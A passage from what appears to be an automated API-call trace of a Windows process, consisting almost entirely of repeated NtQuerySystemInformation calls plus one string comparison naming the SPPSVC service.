(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0240.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0240.858] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0240.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0240.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 